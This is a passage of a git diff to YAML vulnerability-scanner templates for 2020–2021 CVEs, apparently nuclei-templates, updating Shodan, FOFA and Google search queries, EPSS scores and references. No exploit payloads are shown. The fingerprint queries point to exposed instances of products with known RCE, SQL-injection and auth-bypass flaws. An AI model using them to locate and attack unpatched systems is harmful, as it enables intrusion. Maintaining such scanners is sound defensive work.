b/http/cves/2020/CVE-2020-35846.yaml @@ -27,8 +27,12 @@ info: max-request: 1 vendor: agentejo product: cockpit - shodan-query: http.favicon.hash:688609340 - fofa-query: icon_hash=688609340 + shodan-query: + - http.favicon.hash:688609340 + - http.html:"cockpit" + fofa-query: + - icon_hash=688609340 + - body="cockpit" tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo http: diff --git a/http/cves/2020/CVE-2020-35847.yaml b/http/cves/2020/CVE-2020-35847.yaml index 99247dd76c..6f44e15296 100644 --- a/http/cves/2020/CVE-2020-35847.yaml +++ b/http/cves/2020/CVE-2020-35847.yaml @@ -29,8 +29,12 @@ info: max-request: 2 vendor: agentejo product: cockpit - shodan-query: http.favicon.hash:688609340 - fofa-query: icon_hash=688609340 + shodan-query: + - http.favicon.hash:688609340 + - http.html:"cockpit" + fofa-query: + - icon_hash=688609340 + - body="cockpit" tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo http: diff --git a/http/cves/2020/CVE-2020-35848.yaml b/http/cves/2020/CVE-2020-35848.yaml index 1dc59dd239..9389719a65 100644 --- a/http/cves/2020/CVE-2020-35848.yaml +++ b/http/cves/2020/CVE-2020-35848.yaml @@ -27,8 +27,12 @@ info: max-request: 1 vendor: agentejo product: cockpit - shodan-query: http.favicon.hash:688609340 - fofa-query: icon_hash=688609340 + shodan-query: + - http.favicon.hash:688609340 + - http.html:"cockpit" + fofa-query: + - icon_hash=688609340 + - body="cockpit" tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo http: diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml index 5e304db73d..028198850f 100644 --- a/http/cves/2020/CVE-2020-35985.yaml +++ b/http/cves/2020/CVE-2020-35985.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-35985 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.46456 + epss-percentile: 0.47399 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml index 93c123a943..fd3cb4a798 100644 --- a/http/cves/2020/CVE-2020-35986.yaml +++ b/http/cves/2020/CVE-2020-35986.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-35986 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.46456 + epss-percentile: 0.47399 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2020/CVE-2020-36289.yaml b/http/cves/2020/CVE-2020-36289.yaml index ded36677e7..dc772a86f1 100644 --- a/http/cves/2020/CVE-2020-36289.yaml +++ b/http/cves/2020/CVE-2020-36289.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: atlassian product: data_center - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" tags: cve,cve2020,jira,atlassian,unauth http: diff --git a/http/cves/2020/CVE-2020-36365.yaml b/http/cves/2020/CVE-2020-36365.yaml index 5be9a529b5..4b8c026ee6 100644 --- a/http/cves/2020/CVE-2020-36365.yaml +++ b/http/cves/2020/CVE-2020-36365.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: smartstore product: smartstorenet - shodan-query: http.html:'content="Smartstore' + shodan-query: + - http.html:'content="Smartstore' + - http.html:'content="smartstore' fofa-query: body='content="smartstore' tags: cve2020,cve,redirect,smartstore diff --git a/http/cves/2020/CVE-2020-36510.yaml b/http/cves/2020/CVE-2020-36510.yaml index bc0f0e5ae6..3aa25e55f4 100644 --- a/http/cves/2020/CVE-2020-36510.yaml +++ b/http/cves/2020/CVE-2020-36510.yaml @@ -24,12 +24,11 @@ info: cpe: cpe:2.3:a:codetipi:15zine:*:*:*:*:*:wordpress:*:* metadata: verified: "false" - max-request: 1 + max-request: 2 vendor: codetipi product: 15zine framework: wordpress tags: cve2020,cve,xss,wordpress,wp-theme,wp,wpscan,codetipi - flow: http(1) && http(2) http: diff --git a/http/cves/2020/CVE-2020-5284.yaml b/http/cves/2020/CVE-2020-5284.yaml index 85a67310e5..0c629d5b75 100644 --- a/http/cves/2020/CVE-2020-5284.yaml +++ b/http/cves/2020/CVE-2020-5284.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: zeit product: next.js - shodan-query: http.html:"/_next/static" + shodan-query: + - http.html:"/_next/static" + - cpe:"cpe:2.3:a:zeit:next.js" fofa-query: body="/_next/static" tags: cve,cve2020,nextjs,lfi,zeit diff --git a/http/cves/2020/CVE-2020-5776.yaml b/http/cves/2020/CVE-2020-5776.yaml index 450854ca58..1099d740c0 100644 --- a/http/cves/2020/CVE-2020-5776.yaml +++ b/http/cves/2020/CVE-2020-5776.yaml @@ -20,14 +20,16 @@ info: cvss-score: 8.8 cve-id: CVE-2020-5776 cwe-id: CWE-352 - epss-score: 0.50353 - epss-percentile: 0.97455 + epss-score: 0.42595 + epss-percentile: 0.97329 cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: magmi_project product: magmi - shodan-query: http.component:"Magento" + shodan-query: + - http.component:"Magento" + - http.component:"magento" tags: cve,cve2020,magmi,magento,tenable,magmi_project http: diff --git a/http/cves/2020/CVE-2020-5777.yaml b/http/cves/2020/CVE-2020-5777.yaml index 23c5cf6e86..d22583dc5b 100644 --- a/http/cves/2020/CVE-2020-5777.yaml +++ b/http/cves/2020/CVE-2020-5777.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: magmi_project product: magmi - shodan-query: http.component:"Magento" + shodan-query: + - http.component:"Magento" + - http.component:"magento" tags: cve,cve2020,plugin,tenable,magmi,magento,auth,bypass,magmi_project http: diff --git a/http/cves/2020/CVE-2020-5902.yaml b/http/cves/2020/CVE-2020-5902.yaml index b26d0b6feb..b7517b13ca 100644 --- a/http/cves/2020/CVE-2020-5902.yaml +++ b/http/cves/2020/CVE-2020-5902.yaml @@ -28,7 +28,7 @@ info: cve-id: CVE-2020-5902 cwe-id: CWE-22 epss-score: 0.97563 - epss-percentile: 0.99998 + epss-percentile: 0.99999 cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: max-request: 8 diff --git a/http/cves/2020/CVE-2020-6637.yaml b/http/cves/2020/CVE-2020-6637.yaml index 332f8a554d..e6b1a0896b 100644 --- a/http/cves/2020/CVE-2020-6637.yaml +++ b/http/cves/2020/CVE-2020-6637.yaml @@ -27,7 +27,9 @@ info: max-request: 3 vendor: os4ed product: opensis - shodan-query: http.title:"openSIS" + shodan-query: + - http.title:"openSIS" + - http.title:"opensis" fofa-query: title="opensis" google-query: intitle:"opensis" tags: cve,cve2020,sqli,opensis,os4ed diff --git a/http/cves/2020/CVE-2020-6950.yaml b/http/cves/2020/CVE-2020-6950.yaml index ee66ec22f5..3365889c1a 100644 --- a/http/cves/2020/CVE-2020-6950.yaml +++ b/http/cves/2020/CVE-2020-6950.yaml @@ -25,8 +25,14 @@ info: max-request: 4 vendor: eclipse product: mojarra - shodan-query: html:"javax.faces.resource" - fofa-query: body="javax.faces.ViewState" + shodan-query: + - html:"javax.faces.resource" + - http.html:"javax.faces.viewstate" + - http.html:"javax.faces.resource" + fofa-query: + - body="javax.faces.ViewState" + - body="javax.faces.viewstate" + - body="javax.faces.resource" tags: cve,cve2020,mojarra,lfi,eclipse http: diff --git a/http/cves/2020/CVE-2020-7107.yaml b/http/cves/2020/CVE-2020-7107.yaml index ff117d3bab..d8b877f9af 100644 --- a/http/cves/2020/CVE-2020-7107.yaml +++ b/http/cves/2020/CVE-2020-7107.yaml @@ -25,9 +25,9 @@ info: cpe: cpe:2.3:a:etoilewebdesign:ultimate_faq:*:*:*:*:*:wordpress:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: etoilewebdesign - product: ultimate_faq + product: "ultimate_faq" framework: wordpress tags: cve,cve2020,ultimate-faqs,wpscan,xss,wordpress,wp-plugin,wp,etoilewebdesign flow: http(1) && http(2) diff --git a/http/cves/2020/CVE-2020-7209.yaml b/http/cves/2020/CVE-2020-7209.yaml index 01f5f8602f..e26cc89c6e 100644 --- a/http/cves/2020/CVE-2020-7209.yaml +++ b/http/cves/2020/CVE-2020-7209.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-7209 - epss-score: 0.97202 - epss-percentile: 0.99806 + epss-score: 0.97227 + epss-percentile: 0.99837 cpe: cpe:2.3:a:hp:linuxki:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-7796.yaml b/http/cves/2020/CVE-2020-7796.yaml index a94955d0cc..23f82f7dd5 100644 --- a/http/cves/2020/CVE-2020-7796.yaml +++ b/http/cves/2020/CVE-2020-7796.yaml @@ -27,9 +27,15 @@ info: max-request: 1 vendor: synacor product: zimbra_collaboration_suite - shodan-query: http.title:"zimbra collaboration suite" - fofa-query: title="zimbra web client sign in" - google-query: intitle:"zimbra collaboration suite" + shodan-query: + - http.title:"zimbra collaboration suite" + - http.title:"zimbra web client sign in" + fofa-query: + - title="zimbra web client sign in" + - title="zimbra collaboration suite" + google-query: + - intitle:"zimbra collaboration suite" + - intitle:"zimbra web client sign in" tags: cve,cve2020,zimbra,ssrf,oast,synacor http: diff --git a/http/cves/2020/CVE-2020-7961.yaml b/http/cves/2020/CVE-2020-7961.yaml index a7628b92cc..7604f752bd 100644 --- a/http/cves/2020/CVE-2020-7961.yaml +++ b/http/cves/2020/CVE-2020-7961.yaml @@ -25,7 +25,9 @@ info: max-request: 2 vendor: liferay product: liferay_portal - shodan-query: http.favicon.hash:129457226 + shodan-query: + - http.favicon.hash:129457226 + - cpe:"cpe:2.3:a:liferay:liferay_portal" fofa-query: icon_hash=129457226 tags: cve2020,cve,packetstorm,rce,liferay,kev diff --git a/http/cves/2020/CVE-2020-7980.yaml b/http/cves/2020/CVE-2020-7980.yaml index 506042020a..fce505e70b 100644 --- a/http/cves/2020/CVE-2020-7980.yaml +++ b/http/cves/2020/CVE-2020-7980.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: intelliantech product: aptus_web - shodan-query: http.title:"Intellian Aptus Web" + shodan-query: + - http.title:"Intellian Aptus Web" + - http.title:"intellian aptus web" fofa-query: title="intellian aptus web" google-query: intitle:"intellian aptus web" tags: cve2020,cve,intellian,aptus,packetstorm,satellian,rce,intelliantech diff --git a/http/cves/2020/CVE-2020-8115.yaml b/http/cves/2020/CVE-2020-8115.yaml index 80dc34b36e..e1e5d6f28c 100644 --- a/http/cves/2020/CVE-2020-8115.yaml +++ b/http/cves/2020/CVE-2020-8115.yaml @@ -27,8 +27,12 @@ info: max-request: 1 vendor: revive-adserver product: revive_adserver - shodan-query: http.title:"revive adserver" - fofa-query: icon_hash=106844876 + shodan-query: + - http.title:"revive adserver" + - http.favicon.hash:106844876 + fofa-query: + - icon_hash=106844876 + - title="revive adserver" google-query: intitle:"revive adserver" tags: cve,cve2020,xss,hackerone,revive-adserver diff --git a/http/cves/2020/CVE-2020-8194.yaml b/http/cves/2020/CVE-2020-8194.yaml index 785afaac1a..632abbc14f 100644 --- a/http/cves/2020/CVE-2020-8194.yaml +++ b/http/cves/2020/CVE-2020-8194.yaml @@ -12,13 +12,16 @@ info: reference: - https://support.citrix.com/article/CTX276688 - https://nvd.nist.gov/vuln/detail/CVE-2020-8194 + - https://github.com/Elsfa7-110/kenzer-templates + - https://github.com/SexyBeast233/SecBooks + - https://github.com/merlinepedra/nuclei-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N cvss-score: 6.5 cve-id: CVE-2020-8194 cwe-id: CWE-94 - epss-score: 0.90775 - epss-percentile: 0.98597 + epss-score: 0.97364 + epss-percentile: 0.999 cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8512.yaml b/http/cves/2020/CVE-2020-8512.yaml index e68eb53a12..58bcefc965 100644 --- a/http/cves/2020/CVE-2020-8512.yaml +++ b/http/cves/2020/CVE-2020-8512.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: icewarp product: icewarp_server - shodan-query: title:"icewarp" + shodan-query: + - title:"icewarp" + - http.title:"icewarp" fofa-query: title="icewarp" google-query: intitle:"icewarp" tags: cve,cve2020,edb,packetstorm,xss,icewarp diff --git a/http/cves/2020/CVE-2020-8615.yaml b/http/cves/2020/CVE-2020-8615.yaml index 5e053f6840..c77d957110 100644 --- a/http/cves/2020/CVE-2020-8615.yaml +++ b/http/cves/2020/CVE-2020-8615.yaml @@ -27,9 +27,9 @@ info: vendor: themeum product: tutor_lms framework: wordpress - publicwww-query: /wp-content/plugins/tutor/ shodan-query: http.html:/wp-content/plugins/tutor/ fofa-query: body=/wp-content/plugins/tutor/ + publicwww-query: /wp-content/plugins/tutor/ tags: cve,cve2020,wpscan,packetstorm,csrf,wp-plugin,wp,tutor,wordpress,themeum variables: user: "{{rand_base(6)}}" diff --git a/http/cves/2020/CVE-2020-8654.yaml b/http/cves/2020/CVE-2020-8654.yaml index 9f41122e5c..937a6bb474 100644 --- a/http/cves/2020/CVE-2020-8654.yaml +++ b/http/cves/2020/CVE-2020-8654.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-8654 cwe-id: CWE-78 - epss-score: 0.04987 - epss-percentile: 0.92656 + epss-score: 0.04806 + epss-percentile: 0.92702 cpe: cpe:2.3:a:eyesofnetwork:eyesofnetwork:5.3-0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8771.yaml b/http/cves/2020/CVE-2020-8771.yaml index c98c2542b7..bfc480a7a1 100644 --- a/http/cves/2020/CVE-2020-8771.yaml +++ b/http/cves/2020/CVE-2020-8771.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-8771 - https://wpvulndb.com/vulnerabilities/10010 - https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/ + - https://github.com/HycCodeQL/wordpress classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-8771 cwe-id: CWE-287 - epss-score: 0.07621 - epss-percentile: 0.93504 + epss-score: 0.06911 + epss-percentile: 0.93911 cpe: cpe:2.3:a:wptimecapsule:wp_time_capsule:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-8813.yaml b/http/cves/2020/CVE-2020-8813.yaml index 65de4d1037..3875c074d1 100644 --- a/http/cves/2020/CVE-2020-8813.yaml +++ b/http/cves/2020/CVE-2020-8813.yaml @@ -27,9 +27,17 @@ info: max-request: 1 vendor: cacti product: cacti - fofa-query: icon_hash="-1797138069" - shodan-query: http.title:"login to cacti" - google-query: intitle:"cacti" + shodan-query: + - http.title:"login to cacti" + - http.title:"cacti" + - http.favicon.hash:"-1797138069" + fofa-query: + - icon_hash="-1797138069" + - title="cacti" + - title="login to cacti" + google-query: + - intitle:"cacti" + - intitle:"login to cacti" tags: cve2020,cve,cacti,rce,oast http: diff --git a/http/cves/2020/CVE-2020-9054.yaml b/http/cves/2020/CVE-2020-9054.yaml index f605722b0a..69ef94b227 100644 --- a/http/cves/2020/CVE-2020-9054.yaml +++ b/http/cves/2020/CVE-2020-9054.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-9054 cwe-id: CWE-78 - epss-score: 0.96978 - epss-percentile: 0.99679 + epss-score: 0.96901 + epss-percentile: 0.9971 cpe: cpe:2.3:o:zyxel:nas326_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9344.yaml b/http/cves/2020/CVE-2020-9344.yaml index 0e2ba0e428..f1d02baa52 100644 --- a/http/cves/2020/CVE-2020-9344.yaml +++ b/http/cves/2020/CVE-2020-9344.yaml @@ -28,7 +28,9 @@ info: max-request: 5 vendor: atlassian product: subversion_application_lifecycle_management - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" tags: cve2020,cve,atlassian,jira,xss http: diff --git a/http/cves/2020/CVE-2020-9484.yaml b/http/cves/2020/CVE-2020-9484.yaml index c884944e53..0d3dec9f23 100644 --- a/http/cves/2020/CVE-2020-9484.yaml +++ b/http/cves/2020/CVE-2020-9484.yaml @@ -26,15 +26,21 @@ info: cvss-score: 7 cve-id: CVE-2020-9484 cwe-id: CWE-502 - epss-score: 0.92769 - epss-percentile: 0.98967 + epss-score: 0.92247 + epss-percentile: 0.98942 cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: tomcat - shodan-query: title:"Apache Tomcat" - fofa-query: body="apache tomcat" + shodan-query: + - title:"Apache Tomcat" + - http.title:"apache tomcat" + - http.html:"apache tomcat" + - cpe:"cpe:2.3:a:apache:tomcat" + fofa-query: + - body="apache tomcat" + - title="apache tomcat" google-query: intitle:"apache tomcat" tags: cve2020,cve,rce,packetstorm,apache,tomcat diff --git a/http/cves/2020/CVE-2020-9496.yaml b/http/cves/2020/CVE-2020-9496.yaml index 109b73e9ec..ddd08cddf8 100644 --- a/http/cves/2020/CVE-2020-9496.yaml +++ b/http/cves/2020/CVE-2020-9496.yaml @@ -27,8 +27,12 @@ info: max-request: 1 vendor: apache product: ofbiz - fofa-query: body="ofbiz" - shodan-query: http.html:"ofbiz" + shodan-query: + - http.html:"ofbiz" + - ofbiz.visitor= + fofa-query: + - body="ofbiz" + - app="apache_ofbiz" tags: cve,cve2020,ofbiz,packetstorm,apache,java http: diff --git a/http/cves/2020/CVE-2020-9757.yaml b/http/cves/2020/CVE-2020-9757.yaml index 8f7142b88b..65511769b2 100644 --- a/http/cves/2020/CVE-2020-9757.yaml +++ b/http/cves/2020/CVE-2020-9757.yaml @@ -20,16 +20,21 @@ info: cvss-score: 9.8 cve-id: CVE-2020-9757 cwe-id: CWE-74 - epss-score: 0.96518 - epss-percentile: 0.99576 + epss-score: 0.96294 + epss-percentile: 0.99536 cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: craftcms product: craft_cms + shodan-query: + - cpe:"cpe:2.3:a:craftcms:craft_cms" + - http.html:craftcms + - http.favicon.hash:-47932290 + fofa-query: + - icon_hash=-47932290 + - body=craftcms publicwww-query: craftcms - shodan-query: cpe:"cpe:2.3:a:craftcms:craft_cms" - fofa-query: icon_hash=-47932290 tags: cve,cve2020,ssti,craftcms http: diff --git a/http/cves/2021/CVE-2021-1472.yaml b/http/cves/2021/CVE-2021-1472.yaml index 5b1c40cd40..2d0e473156 100644 --- a/http/cves/2021/CVE-2021-1472.yaml +++ b/http/cves/2021/CVE-2021-1472.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: cisco product: rv160_firmware - shodan-query: http.html:"Cisco rv340" + shodan-query: + - http.html:"Cisco rv340" + - http.html:"cisco rv340" fofa-query: body="cisco rv340" tags: cve2021,cve,packetstorm,seclists,auth-bypass,injection,cisco,rce,intrusive diff --git a/http/cves/2021/CVE-2021-20092.yaml b/http/cves/2021/CVE-2021-20092.yaml index 79459c085f..5ed53acfe4 100644 --- a/http/cves/2021/CVE-2021-20092.yaml +++ b/http/cves/2021/CVE-2021-20092.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-20092 cwe-id: CWE-287 epss-score: 0.01583 - epss-percentile: 0.87054 + epss-percentile: 0.87312 cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-20123.yaml b/http/cves/2021/CVE-2021-20123.yaml index 61550d85a1..1bd968d834 100644 --- a/http/cves/2021/CVE-2021-20123.yaml +++ b/http/cves/2021/CVE-2021-20123.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: draytek product: vigorconnect - shodan-query: http.html:"VigorConnect" + shodan-query: + - http.html:"VigorConnect" + - http.html:"vigorconnect" fofa-query: body="vigorconnect" tags: cve2021,cve,draytek,lfi,vigorconnect,tenable diff --git a/http/cves/2021/CVE-2021-20124.yaml b/http/cves/2021/CVE-2021-20124.yaml index 5be447025c..e78ee9df03 100644 --- a/http/cves/2021/CVE-2021-20124.yaml +++ b/http/cves/2021/CVE-2021-20124.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: draytek product: vigorconnect - shodan-query: http.html:"VigorConnect" + shodan-query: + - http.html:"VigorConnect" + - http.html:"vigorconnect" fofa-query: body="vigorconnect" tags: cve2021,cve,draytek,lfi,vigorconnect,tenable diff --git a/http/cves/2021/CVE-2021-20150.yaml b/http/cves/2021/CVE-2021-20150.yaml index 9404822723..c18c636861 100644 --- a/http/cves/2021/CVE-2021-20150.yaml +++ b/http/cves/2021/CVE-2021-20150.yaml @@ -24,7 +24,9 @@ info: max-request: 1 vendor: trendnet product: tew-827dru_firmware - shodan-query: http.html:"TEW-827DRU" + shodan-query: + - http.html:"TEW-827DRU" + - http.html:"tew-827dru" fofa-query: body="tew-827dru" tags: cve2021,cve,disclosure,router,tenable,trendnet diff --git a/http/cves/2021/CVE-2021-20158.yaml b/http/cves/2021/CVE-2021-20158.yaml index 17181f13bd..d95ec60a1c 100644 --- a/http/cves/2021/CVE-2021-20158.yaml +++ b/http/cves/2021/CVE-2021-20158.yaml @@ -12,19 +12,23 @@ info: reference: - https://www.tenable.com/security/research/tra-2021-54 - https://nvd.nist.gov/vuln/detail/CVE-2021-20150 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-20158 cwe-id: CWE-306 epss-score: 0.01211 - epss-percentile: 0.83754 + epss-percentile: 0.8522 cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:* metadata: max-request: 2 vendor: trendnet product: tew-827dru_firmware - shodan-query: http.html:"TEW-827DRU" + shodan-query: + - http.html:"TEW-827DRU" + - http.html:"tew-827dru" fofa-query: body="tew-827dru" tags: cve2021,cve,disclosure,router,intrusive,tenable,trendnet variables: diff --git a/http/cves/2021/CVE-2021-20323.yaml b/http/cves/2021/CVE-2021-20323.yaml index ab5ea8fd80..1c5cf64515 100644 --- a/http/cves/2021/CVE-2021-20323.yaml +++ b/http/cves/2021/CVE-2021-20323.yaml @@ -30,8 +30,15 @@ info: max-request: 4 vendor: redhat product: keycloak - shodan-query: html:"Keycloak" - fofa-query: title="keycloak" + shodan-query: + - html:"Keycloak" + - http.title:"keycloak" + - http.html:"keycloak" + - http.favicon.hash:-1105083093 + fofa-query: + - title="keycloak" + - icon_hash=-1105083093 + - body="keycloak" google-query: intitle:"keycloak" tags: cve2021,cve,keycloak,xss,redhat diff --git a/http/cves/2021/CVE-2021-20837.yaml b/http/cves/2021/CVE-2021-20837.yaml index ef1406f42d..d92e4a1152 100644 --- a/http/cves/2021/CVE-2021-20837.yaml +++ b/http/cves/2021/CVE-2021-20837.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: sixapart product: movable_type - shodan-query: http.title:"サインイン | movable type pro" + shodan-query: + - http.title:"サインイン | movable type pro" + - cpe:"cpe:2.3:a:sixapart:movable_type" fofa-query: title="サインイン | movable type pro" google-query: intitle:"サインイン | movable type pro" tags: cve2021,cve,packetstorm,rce,movable,sixapart diff --git a/http/cves/2021/CVE-2021-21087.yaml b/http/cves/2021/CVE-2021-21087.yaml index efd063967d..310e5132d8 100644 --- a/http/cves/2021/CVE-2021-21087.yaml +++ b/http/cves/2021/CVE-2021-21087.yaml @@ -28,8 +28,14 @@ info: max-request: 7 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" - fofa-query: title="coldfusion administrator login" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - title="coldfusion administrator login" + - app="adobe-coldfusion" google-query: intitle:"coldfusion administrator login" tags: cve2021,cve,xss,adobe,misc,coldfusion diff --git a/http/cves/2021/CVE-2021-21287.yaml b/http/cves/2021/CVE-2021-21287.yaml index fc37f12b07..9f03d719b2 100644 --- a/http/cves/2021/CVE-2021-21287.yaml +++ b/http/cves/2021/CVE-2021-21287.yaml @@ -27,9 +27,17 @@ info: max-request: 1 vendor: minio product: minio - shodan-query: http.title:"minio browser" - fofa-query: title="minio console" - google-query: intitle:"minio browser" + shodan-query: + - http.title:"minio browser" + - cpe:"cpe:2.3:a:minio:minio" + - http.title:"minio console" + fofa-query: + - title="minio console" + - app="minio" + - title="minio browser" + google-query: + - intitle:"minio browser" + - intitle:"minio console" tags: cve,cve2021,minio,ssrf,oast http: diff --git a/http/cves/2021/CVE-2021-21311.yaml b/http/cves/2021/CVE-2021-21311.yaml index c9271506d0..32863651fc 100644 --- a/http/cves/2021/CVE-2021-21311.yaml +++ b/http/cves/2021/CVE-2021-21311.yaml @@ -26,10 +26,18 @@ info: max-request: 6 vendor: adminer product: adminer - shodan-query: title:"Login - Adminer" - fofa-query: app="Adminer" && body="4.7.8" - hunter-query: app.name="Adminer"&&web.body="4.7.8" + shodan-query: + - title:"Login - Adminer" + - cpe:"cpe:2.3:a:adminer:adminer" + - http.title:"login - adminer" + fofa-query: + - app="Adminer" && body="4.7.8" + - title="login - adminer" + - app="adminer" && body="4.7.8" google-query: intitle:"login - adminer" + hunter-query: + - app.name="Adminer"&&web.body="4.7.8" + - app.name="adminer"&&web.body="4.7.8" tags: cve2021,cve,adminer,ssrf http: diff --git a/http/cves/2021/CVE-2021-21402.yaml b/http/cves/2021/CVE-2021-21402.yaml index 5b4343b512..7fd548be5d 100644 --- a/http/cves/2021/CVE-2021-21402.yaml +++ b/http/cves/2021/CVE-2021-21402.yaml @@ -28,8 +28,15 @@ info: max-request: 2 vendor: jellyfin product: jellyfin - shodan-query: http.html:"Jellyfin" - fofa-query: title="Jellyfin" || body="http://jellyfin.media" + shodan-query: + - http.html:"Jellyfin" + - http.html:"jellyfin" + - http.title:"jellyfin" + fofa-query: + - title="Jellyfin" || body="http://jellyfin.media" + - title="jellyfin" + - body="jellyfin" + - title="jellyfin" || body="http://jellyfin.media" google-query: intitle:"jellyfin" tags: cve,cve2021,jellyfin,lfi diff --git a/http/cves/2021/CVE-2021-21799.yaml b/http/cves/2021/CVE-2021-21799.yaml index f24355aa4a..4e2c211b24 100644 --- a/http/cves/2021/CVE-2021-21799.yaml +++ b/http/cves/2021/CVE-2021-21799.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: advantech product: r-seenet - shodan-query: http.html:"R-SeeNet" + shodan-query: + - http.html:"R-SeeNet" + - http.html:"r-seenet" fofa-query: body="r-seenet" tags: cve2021,cve,xss,r-seenet,advantech diff --git a/http/cves/2021/CVE-2021-21800.yaml b/http/cves/2021/CVE-2021-21800.yaml index c062217bfa..c9fe1fe821 100644 --- a/http/cves/2021/CVE-2021-21800.yaml +++ b/http/cves/2021/CVE-2021-21800.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: advantech product: r-seenet - shodan-query: http.html:"R-SeeNet" + shodan-query: + - http.html:"R-SeeNet" + - http.html:"r-seenet" fofa-query: body="r-seenet" tags: cve2021,cve,xss,r-seenet,advantech diff --git a/http/cves/2021/CVE-2021-21805.yaml b/http/cves/2021/CVE-2021-21805.yaml index e258ea3eb1..d0d64995f3 100644 --- a/http/cves/2021/CVE-2021-21805.yaml +++ b/http/cves/2021/CVE-2021-21805.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: advantech product: r-seenet - shodan-query: http.html:"R-SeeNet" + shodan-query: + - http.html:"R-SeeNet" + - http.html:"r-seenet" fofa-query: body="r-seenet" tags: cve2021,cve,rce,r-seenet,advantech diff --git a/http/cves/2021/CVE-2021-21985.yaml b/http/cves/2021/CVE-2021-21985.yaml index a7ad7f0a67..2fb236dcda 100644 --- a/http/cves/2021/CVE-2021-21985.yaml +++ b/http/cves/2021/CVE-2021-21985.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-21985 cwe-id: CWE-20 - epss-score: 0.97407 - epss-percentile: 0.9992 + epss-score: 0.97371 + epss-percentile: 0.99903 cpe: cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-22054.yaml b/http/cves/2021/CVE-2021-22054.yaml index cf1cf472fe..de88f2140b 100644 --- a/http/cves/2021/CVE-2021-22054.yaml +++ b/http/cves/2021/CVE-2021-22054.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: vmware product: workspace_one_uem_console - fofa-query: banner="/AirWatch/default.aspx" || header="/AirWatch/default.aspx" + fofa-query: + - banner="/AirWatch/default.aspx" || header="/AirWatch/default.aspx" + - banner="/airwatch/default.aspx" || header="/airwatch/default.aspx" tags: cve2021,cve,vmware,workspace,ssrf http: diff --git a/http/cves/2021/CVE-2021-22122.yaml b/http/cves/2021/CVE-2021-22122.yaml index c071ecba55..a46c7b7cb5 100644 --- a/http/cves/2021/CVE-2021-22122.yaml +++ 